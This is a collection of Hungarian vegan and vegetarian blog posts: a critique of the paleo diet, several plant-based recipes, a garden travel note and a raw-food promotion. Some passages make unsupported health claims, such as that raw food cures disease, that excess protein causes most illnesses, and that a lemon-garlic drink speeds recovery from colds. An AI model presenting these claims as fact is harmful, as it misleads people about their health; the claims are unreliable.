Kövezzenek meg, de én egyáltalán nem látom az emberben azt a hiperhúsevőt, aminek a paleo-diéta igyekszik beállítani. Tudjuk, hogy a tigris, meg az oroszlán az. Láttam már jó néhány természetfilmet, ahol ezek a hatalmas macskák a prédájuk után iramodnak, majd utolérve, tekintélyes karmokban végződő mancsuk egyetlen ütésével leterítik. Azután irgalmatlanul erős állkapcsukkal könnyedén elroppantják a gazella, meg a kafferbivaly nyakát. Végül ott helyben jól fejlett tépőfogaikkal felhasítják áldozatuk vastag bőrét, és belakmároznak a nyers, véres húsból. Desszertként pedig elfogyasztják az emésztett növényi táplálékot tartalmazó beleket, mert máshogy képtelenek lennének a növényi cellulózt (rostot) bejuttatni a szervezetükbe.
Most hunyd be a szemed egy percre és képzeld el, hogy ugyanezt az ember csinálja. Az mondod, hogy ez lehetetlen? Képtelen úgy vadászni, mint a tigris meg az oroszlán? Jaj, kérlek, ne viccelj már!
Az ember született vadász! Beül a dzsipjébe, mert a gazellát másképp nem érné utol. Az az igazi, ha a lövés előtt az állatokat karámba terelik neki, akkor biztosan hazavihet legalább egy trófeát - nem viccelek, így vadásznak például Afrikában a ,,hipervadászok. Ott van mellette a távcsöves puskája (a látása, meg a szaglása sem egy ragadozóé), mert jobb, ha egészen távolról teríti le az áldozatát, hiszen sem karmai, sem erős mancsa nincs, amivel leüthetné több száz kilós állatot. Az állkapocsról ne is beszéljünk. Hétszentség, hogy nem tudja átharapni még egy nyeszlett borz torkát sem.
Viszont kése van, hogy erős tépőfogak hiányában képes legyen felhasítani a préda bőrét. Kibelezi az áldozatot (a beleket gondosan ott hagyja a szavannán dögevőknek), de nem ott helyben eszi meg a véres nyers húst, hanem hazaviszi és odaadja anyunak, hogy alaposan megfűszerezve főzze vagy süsse meg. Na ja, különben ki a fene tudná megenni ezt az oszladozó, büdös, véres, rosszízű, itt-ott férgekkel tűzdelt valamit?
A fenti módszert, az emberiség viszonylag kevés tagja alkalmazza. De mit csinál a többi, hiszen muszáj naponta húshoz jutniuk, mert ők vadászok, szükségük van rá. Hát bemennek a boltba és levadásszák a polcokról a kis pampalinik.
Nem tartom teljesen reálisnak, hogy az ember a pattintott kőkorszakban, kezdetleges eszközei segítségével (a híresztelésekkel ellentétben, akkor még nem volt dzsip, meg távcsöves puska) mamut csordákat levadászva, napi szinten képes volt biztosítani a húsellátást. Autentikus választ valószínűleg maga az ősember tudna adni, és ha a tudomány jól kérdez, sikerül szóra bírnia. Ez volt a magánvéleményem, és most következzen a cikk, ami nemrégiben jelent meg a care2.com-on.
Forrás: care2.com
A paleo diéta divattá vált, de vajon az evés ezen módja tényeken, vagy fikción alapszik? Az elmúlt években önsegítő könyvek hatalmas áradata jelent meg, melyek azt ajánlották, hogy térjünk vissza őseink étkezési szokásaihoz. De pontosan mit is ettek az őseink?
Az antropológusok már évek óta vizsgálják a régmúlt táplálkozási szokásait, és ahogy várható volt megoszlik a véleményük róla. Vannak, akik amellett érvelnek, hogy az étrend alapját a gyűjtögetésből származó gyümölcsök és diófélék adták, míg az állati fehérje inkább az élvezet, mintsem a mindennapi valóság része volt. Mások azt akarják elhitetni velünk, hogy nagy vadászok voltunk, akik húsból álló étrendjüket némi bogyóval küldték le.
Szerencsére egy új kutatás megadja a választ arra, hogy valójában milyen lehetett a paleolitikus táplálkozás - bár az eredmény lehet, hogy meglepő lesz. Egy biztos, teljesebb képet kapunk arról, amit elődeink ettek, ha a kérdést szélesebb kontextusba helyezzük.
Minden a bélrendszerből vezethető le, különösen a vastagbélből. A ragadozóknak hatalmas, sima gyomra van, ami a zsákmányt proteinné alakítja. A növényevők gyomra szőrszerű bolyhokkal és baktériumokkal segíti a növények feldolgozását. A kérődzők, mint például a szarvasmarhák, egyfajta óriási erjesztőgyomorral rendelkeznek, amely speciális zsírsavakat állít elő, ezt képesek tárolni és felhasználni. Másoknak alig van gyomra, így az erjedés egy hatalmas vastagbélben történik.
Az emberi bélrendszer meglepően unalmas, de érdekes módon hasonlít az orangutánokéhoz és a csimpánzokéhoz (néhány kivételtől eltekintve). Szóval, mit esznek a ma élő főemlősök, akiknek a bélrendszere hasonlít a mienkre?
Az étrend minden majomnál és emberszabásúnál egyszerű. Gyümölcsök, diófélék, levelek, esetenként uzsonnára egy gyík vagy madár. Vagyis a főemlősök képesek megenni a cukros gyümölcsöket, leveleket és a húst, de ez utóbbit nagyon ritkán fogyasztják.
Az emberszabásúak által elfogyasztott étel nagy része növényi eredetű, nem pedig állati, és a kutatás azt sugallja, hogy így volt ez, az elmúlt harminc millió évben is.
Egyszerűbben fogalmazva, a mi főemlős bélrendszerünk növényevésre van tervezve, ez volt valójában a paleolit étrend. Lehet, hogy egyedülálló immunrendszerünk, agyunk, kezünk van, de a bélrendszerünkben nincs semmi különleges. Több tíz millió éven keresztül gyümölcsök, levelek és alkalmanként egy darabka nyers hús került bele.
Lehet, hogy barlanglakó őseink nem voltak 100%-ban vegetáriánusok, de biztosan nem voltak ragadozók sem, ahogy el akarják hitetni velünk.
Amikor az evés tökéletes modelljét próbáljuk megalkotni, sok tényezőt kell figyelembe vennünk, és az új tanulmány ezeket is felfrissíti. A rendelkezésre álló kutatások alapján leszögezhetjük, hogy vannak különbségek az emésztő rendszerünkben, hiszen testünk fejlődött annak érdekében, hogy alkalmazkodjon a nehezebb állati fehérjét tartalmazó étrendhez, és természetesen az ételek feldolgozásához is.
Egyértelműen látható, hogy a növényi alapú étrend egészséges, és minél több gyümölcsöt, zöldséget fogyasztunk, annál több előnyre teszünk szert.
A cikk végére kívánkozik a MDOSZ ez év februárjában kiadott hírlevele, mely a paleo-diéta kérdéseivel foglalkozva a következő megállapítást tette: ,,számítások szerint, ha az emberiség egésze visszatérne a paleolitikus étrendhez, a földön ma élő állatok összessége és az élelmiszeripar együttesen sem lenne képes ellátni a lakosságot ilyen mennyiségű hússal. Úgy gondolom, ha semmilyen más érv nem szólna a paleo-diéta ellen, ez akkor is éppen elég meggyőző lenne.
Tönköly kolbász
2013. október 14. La Veganista
A vegán kolbászt aranyáron mérik a boltokban, ezért jobb, ha otthon készítjük. Bár időigényes művelet, a végeredmény nagyon finom, és olcsón előállítható. A kolbászanyagot nyugodtan kóstolgathassuk miközben fűszerezzük, így biztosan a saját ízlésünket fogja tükrözni, amikor elkészül. A kész kolbász, hagyjuk akár 2-3 napig is a hűtőben érlelődni, hogy az ízek kiteljesedhessenek. A vegán chorizoval ellentétben ez a bolti gabonakolbászhoz hasonlóan morzsálódó textúrával rendelkezik, legalábbis én nem tudtam tisztességes karikákra vágni. Elképzelhető, hogy egy kis zabliszttel, vagy csicseriborsó liszttel ezen is lehetne segíteni. Ettől függetlenül nagyon finom. Nálunk a chorizohoz hasonlóan slágertermék.
Hozzávalók:
- 15 dkg tönkölybúza (átválogatva, megmosva, egy éjszakára beáztatva)
- 10 dkg zabpehely
- 1 evőkanál vegán ételízesítő
- 3-4 gerezd zúzott fokhagyma
- 1 késhegynyi őrölt fekete bors
- 1 késhegynyi durvára őrölt színes borskeverék
- 1 púpos teáskanál majoránna
- 2 teáskanálnyi durvára őrölt köménymag
- 1-2 teáskanál balzsamecet (elhagyható)
- 1,5 evőkanál fűszerpaprika
- 1-1,5 kávéskanál füstölt pimentón paprika (ízlés szerint édes vagy erős)
- 0,5 dl étolaj
- só ízlés szerint (ha sótlannak érzed kóstoláskor a kolbász masszát)
Így készítsd el:
- A tönkölybúzát főzd puhára kétszeres mennyiségű vízben, lassú tűzön kb. 1,5-2 óra alatt. (Az elfőtt vízmennyiséget időnként pótolni kell, nehogy leégjen.)
- A megfőtt tönkölyt szűrd le, és botmixerrel, vagy aprítógéppel vágd rusztikus állagúra. (Itt-ott maradjanak benne egész gabonaszemek.)
- A zabpelyhet szintén főzd meg fedő alatt kb. 3 dl vízben, időnként kevergetve. 10-15 perc alatt megpuhul. (A zabpelyhet érdemes a tönköly főzés utolsó félórájára időzíteni, hogy egyszerre legyen kész, mert mindkét anyaggal melegen kell dolgozni.)
- Egy nagyobb tálban kézzel dolgozd össze a gabonákat a fűszerekkel.
- Melegítsd elő a sütőt 220 fokra.
- A kolbász masszát terítsd szét sütőpapírral bélelt tepsiben egy kanál segítségével, és tedd be a sütőbe 10 percre, hogy megpiruljon egy kicsit.
- Ezután hagyd kihűlni, majd formázz belőle tetszés szerinti méretű kolbászt, vagy szalámit, és tekerd bele tiszta sütőpapírba, vagy alufóliába. A hűtőben sokáig eláll.
Fügés zabkása
Itt a finomságos füge szezonja és olyan jó dologgal áldott meg minket a jó Isten, hogy a telek, ahol a lakásunk fekszik, fügefával is rendelkezik. Hatalmas fügefa. Eldugva az épület mögött csak az tud róla, aki erre lakik. Vagy 20 éves lehet. Nagyon finom gyümölcsök teremnek rajta. Amikor leszedtem az éppen megérett egyedeket, találtam olyat, ami a fán már szinte megaszalódott, hmmmmmmmmm!!! felülmúlhatatlan és rendkívül édes volt. (Kár, hogy nem terem egész évben!)
Szóval miért együk fügét? Kalcium. Azt tartalmaz nagy mennyiségben, ami pedig jó a csontoknak. Azt mondják, ha aszalt fügét mézzel és vízzel összekeverve fogyasztjuk, segít megszabadítani a torokfájástól. Ez pedig most különösen ajánlott sokaknak, akik az őszi megbetegedések valamelyikével küzdenek. A füge cinktartalma prosztatamegbetegedések esetén segíthet. Mivel B-vitaminban is jócskán gazdag, idegnyugtató, és emésztési problémák esetén is gyógyír lehet. Rostdús mivoltának köszönhetően székrekedéskor is ajánlott fogyasztani.
A fügét amúgy már a történelem kezdetekor megemlítik. Az Ószövetség első lapjain találkozunk vele, amikor Ádám és Éva a bűnbe esés után fügefa levelekkel takarták el mezítelenségüket.
A recept:
Hozzávalók:
1 adag zabpehely (pl. 2 marék)
víz
néhány szem friss füge
reszelt citromhéj
igény esetén növényi tej vagy növényi tejpor
Elkészítés:
Ha apró szemű zabpelyhünk van, akkor a lábosban, amiben főzni fogjuk, kicsit megpirítjuk. Épp, amíg illata lesz a pirítástól. Majd felöntjük vízzel. Figyelve és olykor megkeverve addig főzzük, míg a zabpehely jól megpuhul. Főzés közben szórunk bele reszelt citromhéjat és felkarikázott fügét.
Ha nagy szemű zabpehellyel dolgozunk, akkor ugyanígy megpiríthatjuk, de egy éjszakára akár be is áztathatjuk hideg vízbe. Másnap pedig felfőzzük. Az ilyen zabpelyhek több főzési időt igényelnek.
Ha azt szeretnénk, hogy valamilyen formában készítsük el a zabkását, érdemes a formát hideg vízzel kiöblíteni, majd a jó alaposan megfőzött zabkását (jó pépesre készítve) beleönteni. Hideg helyen pihentetjük egy-két órát, majd a formából kiborítjuk és díszítjük. (Fügekarikákkal és reszelt citromhéjjal díszítettem.) Ha még biztosabbra akarunk menni, frissen-tartó fóliával béleljük ki az edényt és azt követően kanalazzuk bele a zabkását.
Ugyanez a finomság elkészíthető kölessel is. Szintén jó alaposan kell megfőzni a kölest. Elkészítettem így is, de erről már nem készült kép. Munkába vittem ugyanis és ott fogyasztottam el tápláló reggeliként. Nem is voltam éhes órákon át.
Akiknek nem elég édes a fügés reggeli (szerintem teljesen édes), azok keverhetnek hozzá mézet vagy valamilyen édesítőt, mint gyümölcscukor vagy nyírfacukor, stb. S akik csak növényi tejjel szeretik, azok pedig elkészíthetik a köles és a zabkását is növényi tejjel. Már írtam párszor, hogy én inkább ezek nélkül szeretem.
Gyógykoktél
Napjainkban sokan náthásak, megfáztak, vagy elkapták közvetlen környezetükben betegeskedőtől a betegséget. Nekik ajánlom a következő gyógykoktélt. Nátha, megfázás, légúti megbetegedés idején ajánlott elsősorban fogyasztani ezt a gyógykoktélt. Megelőzésre is alkalmas, de ennek segítségével gyorsabban gyógyulhatunk ki betegségünkből. (Főleg, ha a napi stresszt, munkavégzést a lehető legminimálisabbra csökkentjük és megfelelő ágynyugalomban, meleg szobában próbálunk átlendülni a betegségünkön.)
A recept:
Hozzávalók:
2 citrom
1 fej fokhagyma
1 kisebb gyömbér
meleg víz
igény esetén méz/biocsicsóka
Elkészítés:
A citromok héját alaposan megmossuk, lereszeljük vagy meghámozzuk. (Mi lereszeltük, hogy a reszeléket később fel tudjuk használni.) A fokhagymát és a gyömbért megpucoljuk. A citromokat gerezdekben, vagy kisebb darabokra szeletelve a fokhagymával és a felkockázott gyömbérrel együtt aprítógépbe tesszük. Jó alaposan összeaprítjuk, keverjük. Mivel a citrom ad levet, így könnyen pépessé válik az egész. Közben vizet melegítünk. (Nem forralunk, csak melegítünk.) A citromos pépet egy kancsóba kanalazzuk át és a meleg vizet ráöntjük. Azért nem jó, ha forraljuk, mert a C-vitamin tartalma így gyorsan tönkre megy. Ezért ajánlom a meleg vizet. Így azonnal fogyaszthatjuk is gyógykoktélunkat. Ajánlatos, ha egyből valami nagyobb pohárba vagy bögrébe töltjük és mielőbb megisszuk. (Nálunk a fél literes pohár a nyerő.) Ugyanis így könnyebben rávesszük magunkat a rendszeres ivásra, ami betegség idején pláne fontos, hiszen a sok folyadék kimossa szervezetünkből a sok bacit.
A citromnak köszönhetően nem lesz fokhagymás a leheletünk még akkor sem, ha egy nap 2 litert megiszunk ebből a folyadékból.
Ehető kerteket! Szlovén útibeszámolók
Az Ehető kerteket! program keretében 2013.06.07-09. között a szlovén Ig városában működő Mule Association vendégeként részt vettünk egy tanulmányúton. Az út fő témája a kertész és a természet kapcsolata illetve a helyi közösségi kertek bemutatása volt. Utunk során lehetőségünk volt betekintést nyerni a helyi kiskertekbe - egy kisváros közösségi kertjébe (Ig) - és egy nagyvárosi közösségi kertbe (Ljubljana) - valamint egy éppen induló közösségi kert megnyitóján is részt vettünk. Megismerkedtünk néhány ehető vadnövénnyel - megtanultuk a begyűjtés módját és a felhasználási lehetőségeit és elkészítettük saját növénypréssel színezett-díszített illat-zsákjainkat és mini asztalterítőinket. OLVASD EL ÚTIBESZÁMOLÓINKAT: Szlovén közösségi kertek: http:// ehetokertek.wordpress.com/ partnerekutazasok/szlovenia/ szloveniai-utibeszamolo-kozosse gi-kertek/ Szlovéniai Kert-vadászat: http:// ehetokertek.wordpress.com/ partnerekutazasok/szlovenia/ szloveniai-utibeszamolo-kert-va daszat/ Tanult kerti praktikák: http:// ehetokertek.wordpress.com/ partnerekutazasok/szlovenia/ szloveniai-utibeszamolo-a-kerte szkedeshez-tanultuk/ Gyógynövénytúra és gyógynövény zsák készítése: http:// ehetokertek.wordpress.com/ partnerekutazasok/szlovenia/ szloveniai-utibeszamolo-gyogyno venytura-es/ A csapat - Személyes benyomások: http:// ehetokertek.wordpress.com/ partnerekutazasok/szlovenia/ szloveniai-utibeszamolo-szemely es-benyomasok/
Őszi ízek egy sütőtökbe zárva
2013. október 1. Zizi kalandjai
Azt hiszem ezzel a bejegyzéssel beindítom a sütőtök szezont. Először is, mi is imádjuk, másodszor pedig hamarosan kezdődik a család legifjabb tagjának a szilárd ételekkel való ismerkedése és az első ételek között lesz a sütőtökpüré is. Videó és fényképezőgép be lesz készítve, amikor az első falatot a szájába adjuk! Már nagyon várjuk, hogy lássuk, milyen arcot fog vágni. Remélem, ínyenc lesz Ádi!
Persze a kérdéseket már akkor megkaptam, amikor még csak a pocakomban volt. Na és akkor a gyermek is vegetáriánus lesz? Tényleg nem fogsz neki adni húst? És tehéntejet sem? De akkor mitől fog hízni Ádi? Hogy jutnak majd be a szervezetébe azok a fontos tápanyagok, amelyek a húsban vannak?
Állj!
Mindent csak sorjában. Egyelőre az a terv, hogy vegagyerek lesz. Mi legalábbis ezt a példát fogjuk neki mutatni. Húst biztosan nem fog kapni és egy darabig tejterméket és cukrot sem, a tojást majd meglátjuk (meg később a sajtot is). Tehéntej helyett növényi tejet fog inni (valószínűleg rizstejet vagy később majd mandulatejet). Mondom… ezek a tervek, aztán majd meglátjuk mit hoz a gyakorlat. Mindenesetre be fogok róla számolni itt a blogon.
Persze ha tinédzser korában be akar majd nyomni egy jó nagy marhahúsos hamburgert, nem fogom lebeszélni róla. Hagyom, hogy tapasztalatot gyűjtsön, elvégre mi is ettünk korábban húst.
A környezetünkben elég sok vegetáriánus, sőt vegán család van, akik így táplálkoznak és a gyerekek vidámak, kicsattannak az egészségtől, szépen fejlődnek, szóval hiszek benne, hogy ez működik.
Ez a töltött sütőtök recept tele van minden finomsággal, amit az ősz kínálhat: erdei gomba, dió, na és a fűszerek, rozmaring, chili, koriander. A receptet Jamie egyik szakácskönyvében találtam és nagyon megtetszett (ő rizzsel készítette és fenyőmaggal, én ezeket lecseréltem kuszkuszra, ami sokkal gyorsabban megfő és dióra). Azok a vegánok, akik nem esznek gombát, tegyenek bele jó minőségű füstölt gabonakolbászt… például ilyet (kóstoltam már és nagyon-nagyon finom!). A csípős változatot javaslom ehhez az ételhez.
Töltött sütőtök
Hozzávalók 4 személyre:
- 1,5 kg sütőtök, hosszában félbevágva, kimagozva
- 1 kis marék szárított erdei gomba / 50 g füstölt gabonakolbász
- 1 fej lilahagyma, felaprítva
- 2 gerezd fokhagyma, felaprítva
- 5 db aszalt paradicsom, apróra vágva
- 100 g kuszkusz
- 2 ág friss rozmaring, levelei lecsipkedve és felaprítva
- 1/4 teáskanál chilipor
- 1/4 teáskanál őrölt koriandermag
- 1/2 marék dió, felaprítva
- olvívaolaj
- só, bors
A szárított gombát áztassuk 2 dl forró vízben kb. 5 percig. Közben melegítsük elő a sütőt 200 fokra.
Kanállal vájjunk ki a félbevágott tök hosszúkás részéből is egy keveset, amit szintén meg fogunk tölteni, ahogyan azt a részt is, ahonnan a magokat kikanalaztuk. A kivájt darabokat aprítsuk fel. Egy serpenyőben hevítsünk 2 evőkanál olívaolajat és dinszteljük meg rajta a lilahagymát, fokhagymát pár perc alatt, majd adjuk hozzá a koriandert, chilit, rozmaringot, a felaprított tökhúst és aszalt paradicsomot. Pároljuk 5 percig, hogy megpuhuljon. Öntsük hozzá a gombát és az áztató vizet (ha gabonakolbásszal készítjük, akkor adjuk hozzá a felszeletelt kolbászt és öntsünk hozzá 2 dl vizet). Pároljuk még 2 percig, majd ízesítsük sóval, borssal. Adjuk hozzá a kuszkuszt és a diót, keverjük össze, aztán tömjük meg a keverékkel a tök két felét, majd fordítsuk és nyomjuk össze őket.
Dörzsöljük be a tök héját olívaolajjal, csomagoljuk alufóliába, tegyük egy tepsire és az előmelegített sütőben süssük kb. 1,5-2 órán keresztül, amíg a sütőtök megpuhul.
Döner kebab - a vegánok már a török spájzban vannak
,,Hagyma, csípős mehet? Aki járt már török gyorsétteremben, az valószínűleg evett dönert, akár húsos, akár falafeles verzióban. A boszorkányos gyorsasággal dolgozó, mosolygós török fickók, fél perc alatt a vásárlók kezébe varázsolják a népszerű szendvicset. Amíg Németországban már bontogatják szárnyaikat a vegán dönert áruló éttermek, addig a hazaiak sajnos nem sietik el az ételek veganizálását. Természetesen nem kell lemondanunk erről a jellegzetes török ételről, ha a húst szejtánra cseréljük, az öntethez szója joghurtot használunk, és a pidét is garantáltan vegán összetevőkből sütjük meg. Kedves török vendéglősök, ha esetleg olvassátok ezt a bejegyzést, akkor arra biztatlak benneteket, hogy bővítsétek a döner kínálatot a tisztán növényi változattal is. Egyre nagyobb lesz rá a kereslet. Hozzávalók: Döner ,,hús
6-8 dkg szejtán/fő (vékonyabb forgácsokra vágva)
3-4 teáskanál gyros fűszerkeverék
növényi olaj a pácoláshoz
növényi olaj a sütéshez
A köret:
1 db répa reszelve
1/2 jégsaláta feldarabolva
1 db nagyobb lila hagyma (szeletelve)
1 db kápia, kaliforniai vagy almapaprika (szeletelve)
2-3 db paradicsom (szeletelve)
(mehet bele káposzta, meg uborka is)
Joghurt öntet:
1 kis doboz szójajoghurt, vagy szójatejföl
2-3 csipet őrölt fekete bors
1 gerezd zúzott fokhagyma
1/2 citrom leve
Pide (4db nagyobb kenyér lesz belőle):
500g liszt
4 dl langyos víz
2 csapott teáskanál élesztő
2 nagy csipet só
4 nagy csipet cukor
1 evőkanál olívaolaj
langyos rizstej a kenyér tetejének megkenéséhez
fekete hagymamag (nigella), sima és fekete szezámmag a szóráshoz (amelyik épp van otthon, azt használd)
Így készítsd el: Szejtán előkészítése a dönerhez:
A pácolaj, a fűszerkeverék, a szejtán forgácsokkal együtt kerüljön egy kisebb tálba, amiben alaposan keverd össze majd tedd hűtőbe. Ne ússzon a szejtán az olajban, csak annyit tegyél rá, hogy a fűszeres olaj bevonja a felszínét. A pácolást akár előző nap is elvégezheted, a szejtánnak jót fog tenni. (A minimum pácidő 30-40 perc.)
Pácolás után egy serpenyőben, némi olajon, közepes lángon finoman pirítsd meg a darabokat, annyira hogy vékony aranybarna kéreg képződjön rajta. (Nem szabad túlpirítani, mert akkor ropogós töpörtyűvé válik, és mi azt szeretnénk, ha megtartaná a puhaságát.)
Joghurtos öntet:
A pácolással párhuzamosan összeállítható az öntet. Egy tálban keverd össze a szójajoghurttal vagy szójatejföllel a fokhagymát, a borsot, és folyamatos kóstolás közben add hozzá a citromlevet, nehogy túl savanyú legyen.
Tedd félre a hűtőbe egy zárható edényben felhasználásig.
Pide:
Mérd ki a langyos vizet egy tálba, keverd el benne a cukrot, az élesztőt, és egy csapott evőkanálnyi lisztet.
Várd meg, amíg az élesztő felfut. (barnás hab keletkezik a víz tetején (5-10 perc).
Közben mérd ki a lisztet, szitáld egy tálba, add hozzá a sót, a kimért olajat, és keverd össze.
A felfuttatott élesztőt öntsd a liszthez, dolgozd össze vele és dagaszd 4-5 percig. Nem könnyű a tésztával dolgozni, mert nagyon lágy. (Egy sima evőkanalat szoktam használni az összekeveréshez és a dagasztáshoz, így nem ragad a kezemre a tészta.)
Dagasztás után fedd le a tálat, tedd félre egy meleg helyre és pihentesd. A tészta megkelése hőmérsékletfüggő. 1-1,5 óra kell hozzá.
A megkelt tésztát lisztes kézzel, a bőséggel belisztezett nyújtódeszkára helyezd, és oszd négy felé.
Ezután formázz lapos kerek kenyereket, melyek tetejét kézéllel rácsozd be és a rácsozatba az ujjaddal nyomj mélyedéseket.(A kezed és a tésztát is folyamatosan lisztezd, mert rendkívül lágy és mindenhez odaragad.)
A megformázott pidéket tedd egy sütőpapírral bélelt tepsibe és hagyd kelni konyharuhával lefedve még 30 percig.
Mielőtt a 230 C-ra előmelegített sütőbe tolnád a középső rácsra, kend meg rizstejjel a pidék tetejét, majd szórd meg sima szezámmaggal, fekete hagymamaggal, és fekete szezámmaggal.
Érdemes a sütő aljára egy hőálló edényben vizet elhelyezni. A sütés közben fejlődő gőz segíti kissé megemelni a pide tésztát.
Süsd a pidéket addig, míg a tetejük aranybarna lesz, majd hűtőrácsra szedd ki.
A döner kebab összeállítása:
A pidét meghagyhatod egészben, vagy félbe is vághatod. A lényeg az, hogy egy éles késsel, vágj rajta nyílást, melyen át megöltheted.
Halmozz a pidébe a zöldségekből és a szejtánból, majd ízlés szerint adagolj hozzá a joghurtos öntetből. Lehetőség szerint melegen tálald.
Őszi vitaminjáték a facebook oldalunkon :-)
2013. szeptember 29. Mindennapi ételeink
A Netamin Kft jóvoltából a facebook oldalon ismét játszunk! Ha eléri az oldal az 1500 kedvelőt, akkor a lájkolók között 3 szerencsés nyerhet személyenként 1-1 doboz B 12 és B-komplex vitamint. S hogy miért is jó a B, ill. B 12 vitamin? A B12 vízben oldódó vitamin, amely kulcsfontosságú szerepet játszik az agy és a központi idegrendszer működésében, valamint a vérképzés folyamatában. Emellett szerepet játszik még a sejtek anyagcseréjében, részt vesz a nukleinsavak felépítésében, befolyásolja a szervezet fehérjeszintézisét, elősegíti az aminosavak fehérjékbe való beépülését és fokozza ezek hasznosítását. Növényekben nem fordul elő, amire ügyelniük kell a vegetáriusoknak. A B-komplex vitamin pedig segíti a koncentráló készséget és javítja az emlékező tehetséget. A B-komplex rendszeres szedésével karbantarthatjuk az idegrendszerünket, de a hajunk, bőrünk és körmünk szépségét és egészségét is megőrizhetjük. Várunk mindenkit a facebook oldalunkon!
Mindent bele szilvával!
Az igazat megvallva, ez a sütemény tényleg "mindent bele" módon készült. Utazás előtt voltunk és volt itthon némi alma, müzli, amit már nem volt kedvem megenni és finom, érett szilva. A gyümölcsöket igazán sajnáltam volna romolni hagyni, így aztán süteménybe dolgoztam fel mindezeket és egész jól sikerült.
A recept:
Hozzávalók:
- 1 bögre müzli (különféle pelyhek és magvak, egy kevés aszalt gyümölcs együtteseiből)
- 1/2 bögre gabonatejpor
- 3-4 (fonnyadó) alma felkockázva
- 2 evőkanál olaj
- kb. 1,5 bögre víz (szénsavas jobb, de most én is szénsavmentessel készítettem)
- 1 csapott teáskanálnyi szódabikarbóna
- liszt, amennyi hasonló állagúvá teszi, mint a kevert sütemények tésztája, de nem túl folyós
- szükség szerint némi édesítő - xilit vagy gyümölcscukor, vagy barna cukor vagy méz
- szilva
- sütőpapír
Elkészítés:
Egy keverőtálba először a száraz hozzávalókat tesszük bele (kivéve a kétfajta liszt), összekeverjük - vagyis a müzlit és a gabonatejport -, majd a felkockázott almát, vizet, olajat is hozzáadjuk. Ehhez a masszához keverünk annyi lisztet, amitől kevert tészta állagot kapunk. Ha nagyon édes szájúak vagyunk, még édesíthetjük. (A gabona tejpor amúgy is édes, a müzliben az aszalt gyümölcs is.) Vegyesen tettem bele fehér és teljes kiőrlésű lisztet 2/3 arányban a fehér liszt javára. A masszát simára keverjük, majd sütőpapírral (vagy szilikonlappal) bélelt tepsibe öntjük a masszát. A tetejére pedig a félbevágott szilvaszemeket szépen egymás mellé elhelyezzük. Közepes lángon legalább 40 perc sütés szükséges. Tűpróbával ellenőrizzük.
Tálalás előtt meghinthetjük fahéjas szőlő vagy porcukorral.
Színesítsd velünk étrended! Válassz friss, élő, természetes ételeinkből!
2013. szeptember 23. Nyersétel akadémia
Október 14-től jelenik meg az Egészségkonyha palettáján: a Nyersétel Akadémia ételei. Kóstolja meg Ön is a főzés nélkül készült nyers vegán ételeket! A nyers leveseket, a főételek között a cukkini spagettit, a nyers főzelékeket, a rakott ételeket, a sokféle pizzát, és a gyümölcsökből, olajos magvakból, datolyából készült édességeinket. Nyers vegán ételek alatt növényi eredetű – kizárólag zöldségből, gyümölcsből, olajos magvakból álló – főzés, vagy egyéb hőkezelési eljárás nélkül készült ételeket értünk, melyek nem tartalmaznak semmiféle állati eredetű anyagot (hús, tej, tejtermékek, tojás), továbbá gabonát, lisztet, hozzáadott cukrot, ízfokozó és adalékanyagot. Ételeink teljes mértékben gluténmentesek. Mint ismeretes, a legtöbb betegség hátterében a túl sok fehérje, valamint a túl sok feldolgozott és átalakított étel fogyasztása áll. A nyers, élő ételek természetes orvosságok, lúgosítanak, magas az enzim, vitamin, ásványi anyag- és nyomelem tartalmuk, energiával töltenek fel. A híres görög orvos, Hippokratészt idézve: ,,Ételed legyen az orvosságod, és orvosságod az ételed. elvet valljuk. A Nyersétel Akadémia küldetése, hogy minél több emberrel megismertesse a nyers, élő ételek jótékony, gyógyító hatását. Szeretné eljuttatni ezt az üzenetet mindazokhoz, akik szeretnének az egészségükért tenni - nem csak a vegetáriánus, de a hagyományos konyhán élőkhöz is -, és emberek ezreinek segíteni, és pozitív változást hozni az életükbe azáltal, hogy bemutatja azt az életmódot, melynek alapja az egészséges növényi alapú nyers vegán táplálkozás, s amellyel az életminőség jelentős javulása, gyógyulás várható, és beáll az ideális testsúly. Szó sincs radikális életmódváltásról ! Azt javasoljuk, hogy kezdjék el színesíteni étrendjüket az arra vágyók természetes, élő, nyers, enzimdús ételekkel. Fontos hangsúlyozni, hogy mindeközben nem kell lemondani a megszokott hagyományos ízekről, hisz javarészt mindaz az ízvilág megvan nyersben is (pizza, székelykáposzta, lecsó, fasírt, lasagna, zserbó, stb.), mint amiket megszoktunk már korábban. A nyers táplálkozás nem jelenti a testünk sanyargatását! A friss nyers étel energiabomba a szervezetnek, mely biztosítja az egész napi aktivitásunkat. Miért is szeretjük a nyers konyha alapanyagait, valamint a belőlük készült ételeket: zöldségeket, gyümölcsöket, zöld leveleket, olajos magvakat, csírákat és a zöldfűszereket? Mert: - gazdagok rostokban, amelyek lassítják a cukor felszívódását, és ezzel egyenletesebbé teszik a vércukor szintet, teltségérzetet keltenek és megakadályozzák a székrekedést; - vitaminforrások: frissítik a testet, javítják a memóriát, erősítik a fogakat és csontokat, növelik az állóképességet, lassítják az öregedési folyamatokat, megelőzik a betegségeket; - alacsony a telített zsírtartalmuk: a növények segítenek alacsonyan tartani a vérzsírok szintjét, ezzel csökkentik a szív- és érrendszeri betegségek kialakulásának kockázatát; - kitűnő fehérjeforrások: sokkal könnyebben emészthetőek a növényi fehérjék, mint az állatiak, a zöld levelek fehérje tartalma rendkívül magas; - magas a tápanyagtartalmuk: nagy mennyiségben tartalmaznak a zöldségek ásványi anyagokat (kalcium, kálium, magnézium, vas, stb.), támogatják az immunrendszerünk és idegrendszerünk működését; - természetes gyógyerők: a növényekben számtalan fito vegyület, antioxidáns található, melyek fontos szerepet játszanak a betegségek leküzdésében; - magas az enzimtartalmuk: a zöldségekben található enzimek segítenek megőrizni a szervezet saját enzimpotenciálját, így tovább maradhatunk egészségesek, frissek és fiatalok.
Szilvalekvár cukor- és tartósítószer nélkül
A mindenmentes szilvalekvár önmagában csakis szilva. Semmiféle adalék nem szükséges bele. Sem zselésítő, sem cukor, sem tartósítószer. Mert bizony lehetséges mindezen dolgok nélkül is elrakni mindenféle gyümölcsöt, nem csak szilvát.
A tartósítószermentes befőzés technikájáért köszönetet mondok és hálás vagyok egyik kedves barátom édesanyjának, és a “tolmácsnak” is.
Elkészítés:
A jól megmosott szilvát kimagozzuk, majd turmixgépben leturmixoljuk. A leturmixolt szilvát egy edénybe tesszük, és felforraljuk. Kb. 1 óráig főzzük, míg a habja el nem megy.
